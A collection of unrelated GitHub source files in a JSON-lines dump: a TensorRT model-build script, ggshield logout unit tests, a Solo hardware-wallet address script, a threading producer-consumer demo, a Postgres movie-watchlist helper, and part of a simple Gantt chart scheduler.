args.model_dir / \"traced_model.ts\"\n )\n logger.info(\"***** Build traced model succeeded. *****\")\n return traced_model\n\ndef build_tensorrt(args, traced_model, fp=16):\n args = load_config(args=args)\n set_log_path(args.output_dir)\n tokenizer = get_tokenizer(args=args)\n feature_class = get_feature_class(args)\n\n label_to_id, label_to_id_inv = get_label_to_id(tokenizer, args)\n args.label_to_id = label_to_id\n args.label_to_id_inv = label_to_id_inv\n\n data_dict = json.load(open(args.data_dir / args.data_config['test'], \"r\"))[0]\n feature = feature_class(\n data_dict=data_dict, tokenizer=tokenizer, args=args, diagnosis=False\n )\n\n feature_dict = feature.feature_dict\n\n batch = dict()\n for col in feature_dict:\n batch[col] = torch.stack([feature_dict[col]], dim=0).to(torch.int32).to(args.device)\n print(batch[col].device)\n if 'label' in batch:\n del batch['label']\n\n tensorrt_inputs = []\n for col in batch:\n tensorrt_inputs.append(\n torch_tensorrt.Input(tuple(batch[col].squeeze(-1).shape), dtype=torch.int32)\n )\n\n if fp==32:\n trt_model = torch_tensorrt.compile(traced_model, **{\n \"inputs\": tensorrt_inputs,\n \"enabled_precisions\": {torch.float32}, # Run with FP32\n \"workspace_size\": 1 << 22\n })\n\n logger.info(\"***** Build tensorrt fp32 succeeded. *****\")\n\n else:\n\n trt_model = torch_tensorrt.compile(traced_model, **{\n \"inputs\": tensorrt_inputs,\n \"enabled_precisions\": {torch.float16}, # Run with FP32\n \"workspace_size\": 1 << 22\n })\n\n logger.info(\"***** Build tensorrt fp16 succeeded. *****\")\n\n trt_model.save(\n args.model_dir / f\"trt_model_fp{args.fp}.ts\"\n )\n return trt_model\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config_dir\", type=str, default=\"../output/wbi/org_per_bert_avg_20210925_all_ext2/model\")\n parser.add_argument(\"--device\", type=str, default='cuda')\n parser.add_argument(\"--fp\", type=int, default=16)\n args = parser.parse_args()\n device = args.device\n args = load_config(args=args)\n set_log_path(args.output_dir)\n args.device = device\n traced_model = build_jit_trace(args=args)\n build_tensorrt(args=args, traced_model=traced_model, fp=args.fp)","repo_name":"characterma/canton-target-sentiment","sub_path":"nlp_pipeline/build_tensorrt.py","file_name":"build_tensorrt.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71069841721","text":"from typing import Optional, Tuple\nfrom unittest.mock import Mock\n\nimport pytest\nfrom requests.exceptions import ConnectionError\n\nfrom ggshield.__main__ import cli\nfrom ggshield.core.config import Config\nfrom ggshield.core.constants import DEFAULT_INSTANCE_URL\nfrom ggshield.core.errors import ExitCode\n\nfrom ..utils import add_instance_config\n\n\nclass TestAuthLogout:\n def test_logout_no_account_config(self, cli_fs_runner):\n \"\"\"\n GIVEN -\n WHEN using the logout command and no token is saved in the configuration\n THEN the command exits with an explanatory message\n \"\"\"\n instance_url = \"https://dashboard.gitguardian.com\"\n add_instance_config(with_account=False)\n exit_code, output = self.run_cmd(cli_fs_runner, instance_url)\n\n assert exit_code == ExitCode.UNEXPECTED_ERROR, output\n assert output == (\n f\"Error: No token found for instance {instance_url}\\n\"\n \"First try to login by running:\\n\"\n \" ggshield auth login\\n\"\n )\n\n @pytest.mark.parametrize(\n \"instance_url\", (DEFAULT_INSTANCE_URL, \"https://some-gg-instance.com\")\n )\n @pytest.mark.parametrize(\"revoke\", (True, False))\n def test_valid_logout(self, revoke, instance_url, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command\n THEN the specified instance data is erased\n AND the request for revocation is made if no flag was included\n \"\"\"\n unrelated_url = \"https://some-unrelated-gg-instance.com\"\n\n post_mock = Mock(return_value=Mock(status_code=204, ok=True))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n token_name = \"My great token\"\n add_instance_config(instance_url=instance_url, token_name=token_name)\n\n # unrelated config that should remain unchanged\n add_instance_config(instance_url=unrelated_url)\n\n exit_code, output = self.run_cmd(cli_fs_runner, instance_url, revoke=revoke)\n\n if revoke:\n post_mock.assert_called_once()\n else:\n post_mock.assert_not_called()\n\n config = Config()\n assert config.auth_config.get_instance(instance_url).account is None\n assert (\n config.auth_config.get_instance(unrelated_url).account is not None\n ), \"the unrelated instance should not be affected.\"\n\n assert exit_code == ExitCode.SUCCESS, output\n instance_url = instance_url or \"https://dashboard.gitguardian.com\"\n\n expected_output = f\"Successfully logged out for instance {instance_url}\\n\\n\"\n\n if revoke:\n expected_output += (\n \"Your personal access token has been revoked and removed \"\n \"from your configuration.\\n\"\n )\n else:\n expected_output += (\n \"Your personal access token has been removed \"\n \"from your configuration.\\n\"\n )\n\n assert output == expected_output\n\n def test_logout_revoke_timeout(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command (with implied token revokation)\n AND the revoke request gets a timeout\n THEN the config remains unchanged\n AND the command exits with an explanatory message\n \"\"\"\n\n post_mock = Mock(side_effect=ConnectionError(\"Http max retry\"))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n add_instance_config()\n exit_code, output = self.run_cmd(cli_fs_runner)\n\n post_mock.assert_called_once()\n config = Config()\n assert config.auth_config.get_instance(DEFAULT_INSTANCE_URL).account is not None\n\n assert exit_code == ExitCode.UNEXPECTED_ERROR, output\n assert output == (\n \"Error: Could not connect to GitGuardian.\\n\"\n \"Please check your internet connection and if the specified URL is correct.\\n\"\n )\n\n def test_logout_server_error(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN a saved instance configuration\n WHEN running the logout command (with implied token revokation)\n AND the revoke request gets a server error response\n THEN the config remains unchanged\n AND the command exits with an explanatory message\n \"\"\"\n post_mock = Mock(return_value=Mock(status_code=500, ok=False))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n add_instance_config()\n exit_code, output = self.run_cmd(cli_fs_runner)\n\n post_mock.assert_called_once()\n config = Config()\n assert config.auth_config.get_instance(DEFAULT_INSTANCE_URL).account is not None\n\n assert exit_code == ExitCode.AUTHENTICATION_ERROR, output\n assert output == (\n \"Error: Could not perform the logout command \"\n \"because your token is already revoked or invalid.\\n\"\n \"Please try with the following command:\\n\"\n \" ggshield auth logout --no-revoke\\n\"\n )\n\n def test_logout_all(self, monkeypatch, cli_fs_runner):\n \"\"\"\n GIVEN several saved instances\n WHEN running the logout command with --all parameter\n THEN all tokens are revoked\n AND all account configs are deleted\n \"\"\"\n post_mock = Mock(return_value=Mock(status_code=204, ok=True))\n monkeypatch.setattr(\"ggshield.core.client.GGClient.post\", post_mock)\n\n for instance_url in [\n DEFAULT_INSTANCE_URL,\n \"https://some-gg-instance.com\",\n \"https://some-other-gg-instance.com\",\n ]:\n add_instance_config(instance_url)\n\n exit_code, output = self.run_cmd(cli_fs_runner, all_tokens=True)\n assert len(post_mock.call_args_list) == 3\n\n for instance in Config().auth_config.instances:\n assert instance.account is None, output\n\n assert exit_code == ExitCode.SUCCESS, output\n\n @staticmethod\n def run_cmd(\n cli_fs_runner,\n instance: Optional[str] = None,\n revoke: bool = True,\n all_tokens: bool = False,\n ) -> Tuple[int, str]:\n cmd = [\"auth\", \"logout\"]\n if instance is not None:\n cmd.append(\"--instance=\" + instance)\n if not revoke:\n cmd.append(\"--no-revoke\")\n if all_tokens:\n cmd.append(\"--all\")\n result = cli_fs_runner.invoke(cli, cmd, color=False)\n return result.exit_code, result.output\n","repo_name":"GitGuardian/ggshield","sub_path":"tests/unit/cmd/auth/test_logout.py","file_name":"test_logout.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":1431,"dataset":"github-code","pt":"40"} +{"seq_id":"1114201700","text":"import solo\nimport hashlib\nimport base58\nimport sys\n\n# P value for secp256k1\np = 115792089237316195423570985008687907853269984665640564039457584007908834671663\n\nCMD_PUBKEY = 0x63\nCMD_RESET = 0x64\n\n\nclass Wallet(object):\n def __init__(self, key):\n assert (len(key) == 96)\n x = int.from_bytes(key[:32], byteorder='big')\n y = int.from_bytes(key[32:64], byteorder='big')\n\n self.key = Key(x, y, key[64:])\n\n\nclass Key(object):\n def __init__(self, x, y, chain):\n self.x = x\n self.y = y\n self.chain = chain\n\n # Check that this is a valid key\n assert ((self.x ** 3 + 7 - self.y ** 2) % p == 0)\n\n def get_compressed(self):\n prefix = b'03'\n if self.y % 2 == 0:\n prefix = b'02'\n return prefix + self.x.to_bytes(length=32, byteorder='big')\n\n def get_hash(self):\n return hash160(self.get_compressed())\n\n def get_address(self, prefix: bytes) -> str:\n # Prefix should be a byte sequence\n key_hash = self.get_hash()\n check = checksum(prefix + key_hash)\n unencoded_addr = prefix + key_hash + check\n return base58.b58encode(unencoded_addr).decode(\"ascii\")\n\n\ndef hash160(val):\n s = hashlib.sha256()\n s.update(val)\n r = hashlib.new('ripemd160')\n r.update(s.digest())\n return r.digest()\n\n\ndef checksum(val):\n s = hashlib.sha256()\n s.update(val)\n one = s.digest()\n s = hashlib.sha256()\n s.update(one)\n\n return s.digest()[:4]\n\n\nif __name__ == \"__main__\":\n # Find the Solo key\n client = solo.client.find()\n\n if len(sys.argv) > 1:\n if sys.argv[1] == \"reset\":\n print(\"Resetting device. Press the button to reset\")\n client.ctap2.device.call(CMD_RESET)\n\n wallet = Wallet(client.ctap2.device.call(CMD_PUBKEY))\n address = wallet.key.get_address(b'\\x00')\n print(f\"Address is {str(address)}\")\n","repo_name":"pta2002/solo-hw-wallet","sub_path":"btc/wallet.py","file_name":"wallet.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3958811987","text":"\"\"\"\nFile: producerconsumer2.py\nProducer-consumer demo with synchronization.\nProducer and consumer both access shared data a given number\nof times. They sleep a random interval before each access.\nThe data must be produced before it is consumed, and be produced\nand consumed just once.\nThe condition and Boolean flag on the shared data guarantee that\nthe producer and consumer access the data in the correct order.\n\"\"\"\n\nimport time, random\nfrom threading import Thread, currentThread, Condition\n\nclass SharedCell(object):\n \"\"\"Shared data that sequences writing before reading.\"\"\"\n \n def __init__(self):\n \"\"\"Can produce but not consume at startup.\"\"\"\n self.data = -1\n self.writeable = True\n self.condition = Condition()\n\n def setData(self, data):\n \"\"\"Second caller must wait until someone has\n consumed the data before resetting it.\"\"\"\n self.condition.acquire()\n while not self.writeable:\n self.condition.wait()\n print(\"%s setting data to %d\" % \\\n (currentThread().getName(), data))\n self.data = data\n self.writeable = False\n self.condition.notify()\n self.condition.release()\n\n def getData(self):\n \"\"\"Caller must wait until someone has produced\n the data before accessing it.\"\"\"\n self.condition.acquire()\n while self.writeable:\n self.condition.wait()\n print(\"%s accessing data %d\" % \\\n (currentThread().getName(), self.data))\n self.writeable = True\n self.condition.notify()\n self.condition.release()\n return self.data\n\nclass Producer(Thread):\n \"\"\"A producer of data in a shared cell.\"\"\"\n\n def __init__(self, cell, accessCount, sleepInterval):\n Thread.__init__(self, name = \"Producer\")\n self.accessCount = accessCount\n self.cell = cell\n self.sleepInterval = sleepInterval\n\n def run(self):\n \"\"\"Resets the data in the cell and goes to sleep,\n the given number of times.\"\"\"\n print(\"%s starting up\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepInterval))\n self.cell.setData(count + 1)\n print(\"%s is done producing\\n\" % self.getName())\n\nclass Consumer(Thread):\n \"\"\"A consumer of data in a shared cell.\"\"\"\n\n def __init__(self, cell, accessCount, sleepInterval):\n Thread.__init__(self, name = \"Consumer\")\n self.accessCount = accessCount\n self.cell = cell\n self.sleepInterval = sleepInterval\n\n def run(self):\n \"\"\"Accesses the data in the cell and goes to sleep,\n the given number of times.\"\"\"\n print(\"%s starting up\\n\" % self.getName())\n for count in range(self.accessCount):\n time.sleep(random.randint(1, self.sleepInterval))\n value = self.cell.getData()\n print(\"%s is done consuming\\n\" % self.getName())\n\ndef main():\n accessCount = int(input(\"Enter the number of accesses: \"))\n cell = SharedCell()\n p = Producer(cell, accessCount, 4)\n c = Consumer(cell, accessCount, 4)\n print(\"Starting the threads\")\n p.start()\n c.start()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tjsaotome65/sec430-python","sub_path":"module-06/producerconsumer2.py","file_name":"producerconsumer2.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"41486036280","text":"import psycopg2\r\nimport datetime\r\n\r\nurl = \"enter url here!\"\r\n\r\nCREATE_MOVIES_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS movies(\r\n id SERIAL PRIMARY KEY,\r\n title TEXT,\r\n release_timestamp REAL\r\n );\"\"\"\r\n\r\n\r\nCREATE_USERS_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS users(\r\n username TEXT PRIMARY KEY\r\n );\"\"\"\r\n\r\n\r\nCREATE_WATCHLIST_TABLE = \"\"\"CREATE TABLE IF NOT EXISTS watchlist(\r\n watcher_name TEXT,\r\n movie_id INTEGER,\r\n FOREIGN KEY(watcher_name) REFERENCES users(username),\r\n FOREIGN KEY(movie_id) REFERENCES movies(id)\r\n );\"\"\"\r\n\r\nINSERT_MOVIES = \"INSERT INTO movies (title, release_timestamp) VALUES (%s, %s);\"\r\nINSERT_USER = \"INSERT INTO users (username) VALUES (%s);\"\r\nINSERT_WATCHED_MOVIE = \"INSERT INTO watchlist (watcher_name, movie_id) VALUES (%s,%s);\"\r\nSELECT_ALL_MOVIES = \"SELECT * FROM movies;\"\r\nSELECT_UPCOMING_MOVIES = \"SELECT * FROM movies WHERE release_timestamp > %s;\"\r\nSELECT_WATCHED_MOVIES = \"\"\"SELECT movies.title \r\nFROM movies \r\nJOIN watchlist \r\nON movies.id = watchlist.movie_id \r\nWHERE watcher_name = %s;\"\"\"\r\nDELETE_MOVIE = \"DELETE FROM MOVIES WHERE title = %s;\"\r\n\r\nconnection = psycopg2.connect(url)\r\n\r\n\r\ndef create_tables():\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(CREATE_MOVIES_TABLE)\r\n cursor.execute(CREATE_USERS_TABLE)\r\n cursor.execute(CREATE_WATCHLIST_TABLE)\r\n\r\n\r\ndef add_movie(title, release_timestamp):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(INSERT_MOVIES, (title, release_timestamp))\r\n\r\n\r\ndef add_user(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor.execute(INSERT_USER, (username,))\r\n\r\n\r\ndef get_movies(upcoming = False):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n if upcoming:\r\n today_timestamp = datetime.datetime.today().timestamp()\r\n cursor.execute(SELECT_UPCOMING_MOVIES, (today_timestamp, ))\r\n else:\r\n cursor.execute(SELECT_ALL_MOVIES)\r\n return cursor.fetchall()\r\n\r\n\r\ndef watch_movie(username, movie_id):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n connection.execute(INSERT_WATCHED_MOVIE, (username, movie_id))\r\n\r\n\r\ndef get_watched_movies(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor = connection.cursor()\r\n cursor.execute(SELECT_WATCHED_MOVIES, (username,))\r\n return cursor.fetchall()\r\n\r\n\r\ndef check_username(username):\r\n with connection:\r\n with connection.cursor() as cursor:\r\n cursor = connection.cursor()\r\n cursor.execute('SELECT * FROM users WHERE username = %s;', (username,))\r\n return cursor.fetchall()","repo_name":"Annicheez/PostgresSQL-could-database-implementation-in-python","sub_path":"SqlDatabase.py","file_name":"SqlDatabase.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"865613335","text":"\"\"\"\nCore of simple-scheduler\n\"\"\"\nimport re\nimport random\nfrom datetime import date, timedelta, datetime\nimport logging\nfrom collections import defaultdict\n\nimport svgwrite\n# conversion from mm/cm to pixel is done by ourselve as firefox seems\n# to have a bug for big numbers...\n# 3.543307 is for conversion from mm to pt units !\nmm = 3.543307\ncm = 35.43307\n\nFONT_ATTR = {\n 'fill': 'black',\n 'stroke': 'black',\n 'stroke_width': 0,\n 'font_family': 'Verdana',\n 'font_size': 15\n }\n\nONE_DAY = timedelta(days=1)\nWEEKEND_DAYS = [5, 6]\n\ndef random_color():\n \"\"\"\n http://stackoverflow.com/questions/13998901/generating-a-random-hex-color-in-python\n \"\"\"\n r = lambda: random.randint(0,255)\n return '#%02X%02X%02X' % (r(),r(),r())\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\nclass Chart:\n \"\"\"\n Builds extremely SIMPLE gantt charts.\n\n This is designed to be a basic utility to help estimate schedules and provide a projected\n timeline for a project. As such, not all features like exact start and end dates are supported;\n instead, tasks ask for duration and follow these rules:\n - A resource (person) can never be doing two things at once\n - All dependencies must be complete before a task can begin\n - All tasks are measurable in days\n - Tasks are ordered on the chart top-to-bottom in the order they were added to projects\n\n Currently, vacations/unavailability for resources is not supported and only a single project\n may be added to a chart.\n \"\"\"\n def __init__(self, name):\n self.name = name\n self.projects = []\n self.resources = []\n self.start_date = date.today()\n\n self.work_weekends = False\n self.color = '#FF3030'\n\n def add_project(self, project):\n \"\"\"\n Adds the given project to the chart\n \"\"\"\n if project not in self.projects:\n if len(self.projects) >= 1:\n raise ValueError('Simple Gantt can only handle a single project at a time currently')\n\n self.projects.append(project)\n project.set_chart(self)\n\n def add_resource(self, resource):\n \"\"\"\n Adds the given resource to the gantt chart\n \"\"\"\n if resource not in self.resources:\n self.resources.append(resource)\n resource.set_chart(self)\n\n @property\n def skipped_days(self):\n \"\"\"\n Returns days that are NEVER worked (weekends).\n\n Can be disabled via chart.work_weekends = True\n \"\"\"\n if self.work_weekends:\n return []\n else:\n return WEEKEND_DAYS\n\n @property\n def end_date(self):\n \"\"\"\n Returns the final date any tasks will be performed.\n \"\"\"\n end_date = self.start_date\n for t in self.tasks:\n if t.end_date > end_date:\n end_date = t.end_date\n return end_date\n\n @property\n def tasks(self):\n \"\"\"\n Returns an iterator for all tasks under all projects\n \"\"\"\n for proj in self.projects:\n for t in proj.tasks:\n yield t\n\n def calculate_schedule(self):\n \"\"\"\n Calculates the start and end dates of each task\n \"\"\"\n for proj in self.projects:\n for t in proj.tasks:\n t.schedule()\n\n def save_svg(self, filename, start=None, end=None):\n \"\"\"\n Draws SVG of gantt chart\n\n Based on https://bitbucket.org/xael/python-gantt/\n \"\"\"\n self.calculate_schedule()\n\n # Clear any drawing caches\n #self._reset_coord()\n\n if start is None:\n start_date = self.start_date - ONE_DAY\n else:\n start_date = start\n\n if end is None:\n end_date = self.end_date + 3 * ONE_DAY\n else:\n end_date = end\n\n if start_date > end_date:\n raise ValueError('Unable to draw chart, start date {0} > end_date {1}'.format(start_date, end_date))\n\n # Draw calendar at top\n # How many days do we need to draw?\n maxx = (end_date - start_date).days\n dwg = _my_svgwrite_drawing_wrapper(filename, debug=True)\n\n # Get SVG for each project, but don't actually add yet to make ordering with calendar easy\n projects_svg = []\n projects_height = 0\n for proj in self.projects:\n ldwg = svgwrite.container.Group()\n psvg, pheight = proj.svg(prev_y=2, start=start_date, end=end_date)\n if psvg is not None:\n ldwg.add(psvg)\n projects_svg.append(ldwg)\n projects_height += pheight\n\n # White background and calendar\n dwg.add(svgwrite.shapes.Rect(\n insert=((0)*cm, 0*cm),\n size=((maxx+1)*cm, (projects_height+3)*cm),\n fill='white',\n stroke_width=0,\n opacity=1\n ))\n dwg.add(self._svg_calendar(maxx, projects_height, start_date, datetime.today()))\n\n # Draw each project\n for proj in projects_svg:\n dwg.add(proj)\n\n # Draw dependencies between tasks\n dep = self.svg_dependencies()\n if dep is not None:\n ldwg.add(dep)\n\n dwg.save(width=(maxx+1)*cm, height=(projects_height+3)*cm)\n\n def svg_dependencies(self):\n \"\"\"\n Draws svg dependencies between tasks according to coordinates cached\n when drawing tasks\n \"\"\"\n svg = svgwrite.container.Group()\n for t in self.tasks:\n trepr = t.svg_dependencies()\n if trepr is not None:\n svg.add(trepr)\n return svg\n\n def _svg_calendar(self, maxx, maxy, start_date, today=None):\n \"\"\"\n Draw calendar in svg, begining at start_date for maxx days, containing\n maxy lines. If today is given, draw a blue line at date\n\n Keyword arguments:\n maxx -- number of days, weeks, months or quarters (depending on scale) to draw\n maxy -- number of lines to draw\n start_date -- datetime.date of the first day to draw\n today -- datetime.date of day as today reference\n \"\"\"\n dwg = svgwrite.container.Group()\n\n cal = {0:'Mo', 1:'Tu', 2:'We', 3:'Th', 4:'Fr', 5:'Sa', 6:'Su'}\n\n maxx += 1\n\n vlines = dwg.add(svgwrite.container.Group(id='vlines', stroke='lightgray'))\n for x in range(maxx):\n vlines.add(svgwrite.shapes.Line(start=((x)*cm, 2*cm), end=((x)*cm, (maxy+2)*cm)))\n jour = start_date + timedelta(days=x)\n\n if not today is None and today == jour:\n vlines.add(svgwrite.shapes.Rect(\n insert=((x+0.4)*cm, 2*cm),\n size=(0.2*cm, (maxy)*cm),\n fill='#76e9ff',\n stroke='lightgray',\n stroke_width=0,\n opacity=0.8\n ))\n\n # draw vacations\n if (start_date + timedelta(days=x)).weekday() in self.skipped_days:\n vlines.add(svgwrite.shapes.Rect(\n insert=((x)*cm, 2*cm),\n size=(1*cm, maxy*cm),\n fill='gray',\n stroke='lightgray',\n stroke_width=1,\n opacity=0.7,\n ))\n\n # Current day\n vlines.add(svgwrite.text.Text('{1} {0:02}'.format(jour.day, cal[jour.weekday()][0]),\n insert=((x*10+1)*mm, 19*mm),\n fill='black', stroke='black', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15-3))\n # Year\n if jour.day == 1 and jour.month == 1:\n vlines.add(svgwrite.text.Text('{0}'.format(jour.year),\n insert=((x*10+1)*mm, 5*mm),\n fill='#400000', stroke='#400000', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15+5,\n font_weight=\"bold\"))\n # Month name\n if jour.day == 1:\n vlines.add(svgwrite.text.Text('{0}'.format(jour.strftime(\"%B\")),\n insert=((x*10+1)*mm, 10*mm),\n fill='#800000', stroke='#800000', stroke_width=0,\n font_family=FONT_ATTR['font_family'], font_size=15+3,\n font_weight=\"bold\"))\n # Week number\n if jour.weekday() == 0:\n vlines.add(svgwrite.text.Text('{0:02}'.format(jour.isocalendar()[1]),\n insert=((x*10+1)*mm, 15*mm),\n fill='black', stroke='black', stroke_width=0,\n font_family=FONT_ATTR['font_family'],\n font_size=15+1,\n font_weight=\"bold\"))\n\n vlines.add(svgwrite.shapes.Line(start=((maxx)*cm, 2*cm), end=((maxx)*cm, (maxy+2)*cm)))\n\n hlines = dwg.add(svgwrite.container.Group(id='hlines', stroke='lightgray'))\n\n dwg.add(svgwrite.shapes.Line(start=((0)*cm, (2)*cm), end=((maxx)*cm, (2)*cm), stroke='black'))\n dwg.add(svgwrite.shapes.Line(start=((0)*cm, (maxy+2)*cm), end=((maxx)*cm, (maxy+2)*cm), stroke='black'))\n\n for y in range(2, maxy+3):\n hlines.add(svgwrite.shapes.Line(start=((0)*cm, y*cm), end=((maxx)*cm, y*cm)))\n\n return dwg\n\n def __str__(self):\n \"\"\"\n Display info on all projects under us\n \"\"\"\n s = 'Chart {} starts {}, {} resources\\nProjects:'.format(self.name, self.start_date, len(self.resources))\n for p in self.projects:\n s += '\\n' + str(p)\n return s\n\n\nclass Project:\n \"\"\"\n Collects tasks\n \"\"\"\n def __init__(self, name, chart=None):\n self.name = name\n self.tasks = []\n\n self.chart = None\n self.set_chart(chart)\n\n def set_chart(self, chart):\n \"\"\"\n Assigns task to given chart. Ensures chart has us included in their list.\n \"\"\"\n old_chart = self.chart\n self.chart = chart\n if old_chart != chart and self.chart is not None:\n self.chart.add_project(self)\n\n def add_task(self, task):\n \"\"\"\n Adds the given task project\n \"\"\"\n if task not in self.tasks:\n self.tasks.append(task)\n task.set_project(self)\n\n @property\n def start_date(self):\n \"\"\"\n First date a task under this project will be performed\n \"\"\"\n start_date = None\n for t in self.tasks:\n if start_date is None or start_date > t.start_date:\n start_date = t.start_date\n\n return start_date\n\n @property\n def end_date(self):\n \"\"\"\n Last date a task under this project will be performed\n \"\"\"\n end_date = None\n for t in self.tasks:\n if end_date is None or end_date < t.end_date:\n end_date = t.end_date\n\n return end_date\n\n def svg(self, prev_y=0, start=None, end=None, color=None, level=0, offset=0):\n \"\"\"\n Return (SVG code, number of lines drawn) for the project. Draws all\n tasks and add project name with a purple bar on the left side.\n\n Keyword arguments:\n prev_y -- int, line to start to draw\n start -- datetime.date of first day to draw\n end -- datetime.date of last day to draw\n color -- string of color for drawing the project\n level -- int, indentation level of the project\n scale -- drawing scale (d: days, w: weeks, m: months, q: quaterly)\n offset -- X offset from image border to start of drawing zone\n \"\"\"\n if start is None:\n start = self.start_date\n if end is None:\n end = self.end_date\n\n cy = prev_y + 1*(self.name != \"\")\n\n prj = svgwrite.container.Group()\n\n # Draw tasks\n for t in self.tasks:\n trepr, theight = t.svg(cy, start=start, end=end, color=color, level=level+1, offset=offset)\n if trepr is not None:\n prj.add(trepr)\n cy += theight\n\n fprj = svgwrite.container.Group()\n prj_bar = False\n if self.name != \"\":\n # if ((self.start_date() >= start and self.end_date() <= end)\n # or (self.start_date() >= start and (self.end_date() <= end or self.start_date() <= end))) or level == 1:\n if ((self.start_date >= start and self.end_date <= end)\n or ((self.end_date >=start and self.start_date <= end))) or level == 1:\n fprj.add(svgwrite.text.Text('{0}'.format(self.name), insert=((6*level+3+offset)*mm, ((prev_y)*10+7)*mm), fill=FONT_ATTR['fill'], stroke=FONT_ATTR['stroke'], stroke_width=FONT_ATTR['stroke_width'], font_family=FONT_ATTR['font_family'], font_size=15+3))\n\n fprj.add(svgwrite.shapes.Rect(\n insert=((6*level+0.8+offset)*mm, (prev_y+0.5)*cm),\n size=(0.2*cm, ((cy-prev_y-1)+0.4)*cm),\n fill='purple',\n stroke='lightgray',\n stroke_width=0,\n opacity=0.5\n ))\n prj_bar = True\n else:\n cy -= 1\n\n # Do not display empty tasks\n if (cy - prev_y) == 0 or ((cy - prev_y) == 1 and prj_bar):\n return (None, 0)\n\n fprj.add(prj)\n\n return (fprj, cy-prev_y)\n\n def __str__(self):\n \"\"\"\n Displays info on all tasks\n \"\"\"\n s = 'Project {} with {} tasks:'.format(self.name, len(self.tasks))\n for t in self.tasks:\n s += '\\n' + str(t)\n return s\n\n\nclass Resource:\n \"\"\"\n Resource for the gantt chart. I.E., a person.\n \"\"\"\n def __init__(self, name, chart=None):\n \"\"\"\n Configure required resource attributes\n \"\"\"\n self.name = name\n self.tasks = []\n\n self.chart = None\n self.set_chart(chart)\n\n # Drawing info\n self.color = random_color()\n\n def set_chart(self, chart):\n \"\"\"\n Assigns task to given chart. Ensures chart has us included in their list.\n \"\"\"\n old_chart = self.chart\n self.chart = chart\n if old_chart != chart and self.chart is not None:\n self.chart.add_resource(self)\n\n def add_task(self, task):\n \"\"\"\n Adds the given task to this resource so it knows what it's working on.\n \"\"\"\n if task not in self.tasks:\n self.tasks.append(task)\n task.add_resource(self)\n\n def is_free(self, date):\n \"\"\"\n Determines if the resource is available to work on the given day\n \"\"\"\n for task in self.tasks:\n # If a task isn't scheduled (yet), then we don't need to worry\n # about scheduling around it\n if task.is_scheduled and task.start_date <= date and task.end_date >= date:\n return False\n\n return True\n\n def __str__(self):\n \"\"\"\n Basic resource info\n \"\"\"\n return '{} with {} tasks'.format(self.name, len(self.tasks))\n\n\nclass Task:\n \"\"\"\n Task in project\n \"\"\"\n def __init__(self, name, duration, resources=[], dependencies=[], project=None):\n \"\"\"\n Sets the basic attributes of a task\n \"\"\"\n self.name = name\n self.duration = duration\n self.dependencies = dependencies\n self.percent_done = 0\n\n self.resources = []\n for r in resources:\n self.add_resource(r)\n\n self.project = None\n self.set_project(project)\n\n self._start_date = None\n\n def set_project(self, project):\n \"\"\"\n Assigns task to given project. Ensures project has us included in their list.\n \"\"\"\n old_proj = self.project\n self.project = project\n if old_proj != project and self.project is not None:\n self.project.add_task(self)\n\n def add_resource(self, resource):\n \"\"\"\n Assigns task to given project. Ensures project has us included in their list.\n \"\"\"\n if resource not in self.resources:\n self.resources.append(resource)\n resource.add_task(self)\n\n def schedule(self):\n \"\"\"\n Schedule ourselves based on other tasks and resource availability\n\n General algorithm:\n 1. Try first date immediately after dependency\n 1a. If no dependency, use chart start date\n 2. Keep advancing date until first free date\n \"\"\"\n self.clear_schedule()\n\n chart = self.project.chart\n\n # Dependencies\n start_date = chart.start_date\n for task in self.dependencies:\n # Must already be scheduled. While they would automatically schedule when we ask them to,\n # we enforce this to require tasks to be added in date order\n if not task.is_scheduled:\n raise SchedulingError('Task {} is a dependency of {} but has not been scheduled. Please place task prior to {} in project'.format(\n task.name,\n self.name,\n self.name)\n )\n\n if task.end_date > start_date:\n start_date = task.end_date + ONE_DAY\n\n # Resource deconfliction\n date_is_free = False\n while not date_is_free:\n date_is_free = True\n for resc in self.resources:\n if not resc.is_free(start_date):\n start_date += ONE_DAY\n date_is_free = False\n\n self._start_date = start_date\n\n def clear_schedule(self):\n \"\"\"\n Clears any cached scheduling information\n \"\"\"\n self._start_date = None\n\n @property\n def is_scheduled(self):\n \"\"\"\n Returns if this task has had a start date set\n \"\"\"\n return self._start_date is not None\n\n @property\n def start_date(self):\n \"\"\"\n Returns start date of task, calculating if not already cached\n \"\"\"\n if self._start_date is not None:\n return self._start_date\n\n self.schedule()\n return self._start_date\n\n @property\n def end_date(self):\n \"\"\"\n End date of task based on start and duration.\n\n Marks the final day work is actually performed.\n\n If chart is set to not work weekends, schedule will 